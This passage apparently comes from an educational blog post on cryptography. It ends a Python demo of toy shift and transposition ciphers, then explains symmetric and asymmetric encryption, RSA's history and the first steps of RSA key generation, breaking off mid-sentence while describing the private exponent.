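            return k
    return None


if __name__ == "__main__":
    k = 1
    c = shift_encrypt(k, "fly at once")
    print(c, "->", shift_decrypt(k, c))             # gmz bu podf -> fly at once
    perm = (1, 0, 2, 4, 3)
    t = transpose_encrypt(perm, "hello world")
    print(t, "->", transpose_decrypt(perm, t))      # ehlol owrdl -> hello world
    print("relation (3) holds:", round_trips(7, "meet at noon"))  # True
    print("shift key recovered by brute force:", brute_force_shift(c, "once"))  # 1
```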
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDwmSbSvzQsN6dI0dwzJ4Y9g8Hop8aOgQ0bb7Ltz_jm_twpAYyEucsxqc5JVe8W8k30nyOSKufuaNMqMhuzrW0TaZdl5b_eERX7JTDh7DIGC33Qi8vvacUpngBEaFsUwTvF25ACyfCyVc/s1600/c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDwmSbSvzQsN6dI0dwzJ4Y9g8Hop8aOgQ0bb7Ltz_jm_twpAYyEucsxqc5JVe8W8k30nyOSKufuaNMqMhuzrW0TaZdl5b_eERX7JTDh7DIGC33Qi8vvacUpngBEaFsUwTvF25ACyfCyVc/s1600/c2.png" width="400" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Picture3</b>: Symmetric
cryptography [7]<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif; font-size: large;">Asymmetric
Cryptography<o:p></o:p></span></h1>
<span lang="EN-GB"><span style="font-family: Times, Times New Roman, serif; font-size: large;">
</span></span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Asymmetric cryptography,
also known as public key cryptography, is the category of cryptography that
uses asymmetric key algorithms. </span><span style="font-family: Times, 'Times New Roman', serif;">These
algorithms are used to create a </span><b style="font-family: Times, 'Times New Roman', serif;">mathematically
related key pair: a secret private key and a published public key.</b><span style="font-family: Times, 'Times New Roman', serif;"> [6]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">The following simple
mathematical relationships describe the relation between encryption and
decryption in asymmetric cryptography.</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Encryption ( k1 ,
Plaintext ) = Cipher (4)</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Decryption ( k2 ,
Cipher ) = Plaintext (5)</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">Where k2 is a secret,
non-shared value, k1 is a non-secret, shared value, and Plaintext is the data we want
to convert into Cipher. From relationships (4) and (5) we can conclude that:</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Plaintext = Decryption
( k2 , Cipher ) = Decryption ( k2 , Encryption ( k1 , Plaintext )) (6)</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">From relationship (6) we can
see that recovering the Plaintext is a composite operation that depends on both
keys: the one used to encrypt and the one used to decrypt. Public key cryptography
is used widely. It is the approach employed by most cryptosystems, and it
underlies Internet standards such as Transport Layer Security (TLS), PGP, and
GPG. The most famous
asymmetric algorithm is RSA. In cryptography, RSA (named after Rivest,
Shamir and Adleman, who first publicly described it) is an algorithm for
public-key cryptography. RSA is widely used in electronic commerce, and is
believed to be secure when proper secret keys are used.</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Z7Vy6wF45I6nDWdSJp8lf17WSlCqzJLEObfw5XPkNrjVtHO4bFDETKdeZtQgrRXb7JJ2KDbfbSC5RXZuR2QdLFxVzBCEx24TWe1rb0qnd7DhwMjusPnxRu9mLOFzSzaGAI9FHIXKJwo/s1600/c3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Z7Vy6wF45I6nDWdSJp8lf17WSlCqzJLEObfw5XPkNrjVtHO4bFDETKdeZtQgrRXb7JJ2KDbfbSC5RXZuR2QdLFxVzBCEx24TWe1rb0qnd7DhwMjusPnxRu9mLOFzSzaGAI9FHIXKJwo/s1600/c3.png" /></a></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Picture4</b>: Asymmetric
cryptography [7]<o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b><span style="font-size: large;">Asymmetric and Symmetric Cryptography revised </span></b></span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Unlike Symmetric Cryptography,
Asymmetric Cryptography uses a different key for encryption than for
decryption. I.e., a user knowing the encryption key of an asymmetric algorithm
can encrypt messages, but cannot derive the decryption key and cannot decrypt
messages encrypted with that key. This is the most obvious
difference between Symmetric and Asymmetric Cryptography. Another difference between
Symmetric and Asymmetric Cryptography is the mathematical properties of each
type of algorithm and the way the mathematical algorithm is implemented in a
hardware or software device (further explanation of these differences is out
of the scope of this paper).</span><br />
<br />
<b><span style="font-size: large;">Why RSA is important</span></b><br />
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">The RSA cryptographic algorithm is also
commercially exploited by a company of the same name, RSA. The company RSA is the security division
of EMC (EMC acquired RSA for its security products in 2006). </span><span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">RSA Laboratories is the research center of RSA,
The Security Division of EMC, and the security research group within the EMC
Innovation Network. The group was established in 1991 at RSA Data Security, the
company founded by the inventors of the RSA public-key cryptosystem. Through
its applied research program and academic connections, RSA Laboratories provides
state-of-the-art expertise in cryptography and data security for the benefit of
RSA and EMC. [10]</span></div>
</div>
<div class="MsoNormal">
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">Represented by the equation "c = m<sup>e</sup> mod
n," the RSA algorithm is widely considered the standard for encryption and
the core technology that secures the vast majority of the e-business conducted
on the Internet. The U.S. patent for the RSA algorithm (# 4,405,829,
"Cryptographic Communications System And Method") was issued to the
Massachusetts Institute of Technology (MIT) on September 20, 1983, licensed
exclusively to RSA Security and expires on September 20, 2000. [9]</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">For nearly two decades, more than 800 companies
spanning a range of global industries have turned to RSA Security as a trusted,
strategic partner that can provide the proven, time-tested encryption
implementations and resources designed to speed time to market. These
companies, including nearly 200 so far in 2000, rely on RSA BSAFE® security
software for its encryption implementation and value-added services for a broad
range of B2B, B2C and wireless applications. [9]</span><br />
<b><span style="font-size: large;"><br /></span></b>
<b><span style="font-size: large;">Maths behind RSA</span></b></div>
<br />
The RSA algorithm involves the three following steps:<br />
<ol>
<li>Key generation. </li>
<li>Encryption. </li>
<li>Decryption.</li>
</ol>
</div>
<div class="MsoNormal">
<br />
<b>Note: </b>This is a simplified presentation of RSA.<br />
<div class="MsoNormal">
<br /></div>
<b><span style="font-size: large;">RSA Key generation</span></b><br />
<h1>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif; font-size: small; font-weight: normal;">RSA includes a public
key and a private key. The public key can be known to everyone and is used for
encrypting messages. Messages encrypted with the public key can only be
decrypted using the private key. The keys are generated the following way:</span></h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">1.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Choose
two distinct <b>prime numbers</b> <i>p</i>
and <i>q</i>. In mathematics, a <b>prime number</b> (or a <b>prime</b>) is a
natural number that has exactly two <i>distinct</i> natural-number divisors, 1 and
itself. That means that a prime number can only be divided (without remainder) by 1 and itself:
[13]<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 1</b>: 5/5 = 1<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 2</b>: 5/1 = 5<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">Very simplistically
speaking, it means that dividing a prime number by any integer other than 1 and
itself never gives an integer result, i.e. the remainder is not 0!! <o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Example 3</b>: 5/2 = 2.5 (2.5
is not an integer)<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">The first fifteen prime
numbers are:</span></span><br />
<br />
<b>Example 4:</b> 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47<br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"></span><br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;"><b>Note:</b> For
security purposes, the integers </span><i style="font-family: Times, 'Times New Roman', serif;">p</i><span style="font-family: Times, 'Times New Roman', serif;"> and </span><i style="font-family: Times, 'Times New Roman', serif;">q</i><span style="font-family: Times, 'Times New Roman', serif;"> should be chosen
uniformly at random and should be of similar bit-length. [8]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">2.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Compute
<b><i>n</i> = <i>pq</i></b><i> </i>(a), where <i>n</i> is used as the modulus
for both the public and private keys. For the purposes of this paper we will
not use long, secure integers. (As soon as we have the values n and φ, the
values p and q will no longer be needed.)<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><b>Note</b>: For the algebra to
work properly, these two primes must not be equal. To make the cipher strong,
these prime numbers should be large, and they should be arbitrary-precision
integers of at least 1024 bits (in real-life uses of cryptography, key sizes
are measured in bits).<o:p></o:p></span><br />
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">Example
3: from (a), <b><i>n</i> = <i>pq</i></b>, which means that
if p = 2 and q = 3 then n = 2*3 = 6 (both 2 and 3 are prime, see Example 4).<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">Now that we have the values n and φ, the values p and q will no
longer be useful to us. However, we must ensure that nobody else will ever be
able to discover these values. Destroy them, leaving no trace behind so that
they cannot be used against us in the future. Otherwise, it will be very easy
for an attacker to reconstruct our key pair and decipher our cipher text.<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">3.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Compute
</span><i><span lang="EL">φ</span></i><span lang="EN-GB">(<i>pq</i>) = (<i>p</i> − 1)(<i>q</i> − 1) (c)
or </span><i><span lang="EL">φ</span></i><span lang="EN-GB">(n) = (<i>p</i> − 1)(<i>q</i> − 1). (</span><i><span lang="EL">φ</span></i><span lang="EN-GB"> is Euler's
totient function [11]; the totient function itself is out of the scope of this
paper). <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">4.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Choose
an integer <i>e</i> such that:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < </span><i><span lang="EL">φ</span></i></b><b> (<i>pq</i>)</b><span lang="EN-GB"> <b>or </b><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < </span><i><span lang="EL">φ</span></i></b><b> (<i>n</i>) or <o:p></o:p></b></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><b><span lang="EN-GB">1 < <i>e</i> < <i>(p − 1)
(q − 1)</i></span></b><span lang="EN-GB"> (d)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 36.0pt;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">And <i>e</i>
and </span><i><span lang="EL">φ</span></i><span lang="EN-GB"> (<i>pq</i>) have no common divisors other than 1. We randomly select a
number e (the letter e is used because we will use this value during
encryption) that is greater than 1, less than φ, and relatively prime to φ. Two
numbers are said to be relatively prime if they have no prime factors in
common. Note that e does not necessarily have to be prime. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">The value
of e is used along with the value n to represent the public key used for
encryption.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l1 level2 lfo2; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><i>e</i><span lang="EN-GB"> is
released as the public key exponent<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 36.0pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB">5.<span style="font-size: 7pt;">
</span></span><!--[endif]--><span lang="EN-GB">Determine
<i>d</i> (using modular arithmetic) which satisfies the relation:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmyUAo5zXut7CVMCLs3UaQD4G5wYqvBc3yQ-30c48vRQQZ6rWPjwa7g0ejWKJ1sRZRAHV8C1dXl9WnABjAU9SFS87m2Ch-CIeyCrcqb6jF37b7naIJzBAmoCcRy1XfpqZ3XUdtbRgu55c/s1600/c4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmyUAo5zXut7CVMCLs3UaQD4G5wYqvBc3yQ-30c48vRQQZ6rWPjwa7g0ejWKJ1sRZRAHV8C1dXl9WnABjAU9SFS87m2Ch-CIeyCrcqb6jF37b7naIJzBAmoCcRy1XfpqZ3XUdtbRgu55c/s1600/c4.png" /></a></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18.0pt; mso-list: l1 level1 lfo2; tab-stops: list 18.0pt; text-indent: -18.0pt;">
<span lang="EN-GB"><br /></span></div>
<!--EndFragment--><div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
This is
often computed using the extended Euclidean algorithm [12] (the Euclidean algorithm
itself is out of the scope of this paper).</span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal" style="margin-left: 54.0pt; mso-list: l0 level1 lfo1; tab-stops: list 54.0pt; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">·<span style="font-size: 7pt;">
</span></span><!--[endif]--><i><span lang="EN-GB">d</span></i><span lang="EN-GB"> is kept as
the private key exponent.<o:p></o:p></span></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<b style="font-family: Times, 'Times New Roman', serif;">Note</b><span style="font-family: Times, 'Times New Roman', serif;">: We must calculate the unique value d (to be used during decryption)
that satisfies the requirement that, if d * e is divided by φ, the
remainder of the division is 1. The mathematical notation for this (as already
described above) is d * e = 1 (mod φ).</span><br />
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB"><br /></span></span>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><span lang="EN-GB">In mathematical jargon, we say that d is the multiplicative inverse of
e modulo φ [15]. The value of d is to be kept secret. If you know the value of
φ, the value of d can be easily obtained from e using the extended
Euclidean algorithm. If you know n (which is public), but not p or q (which
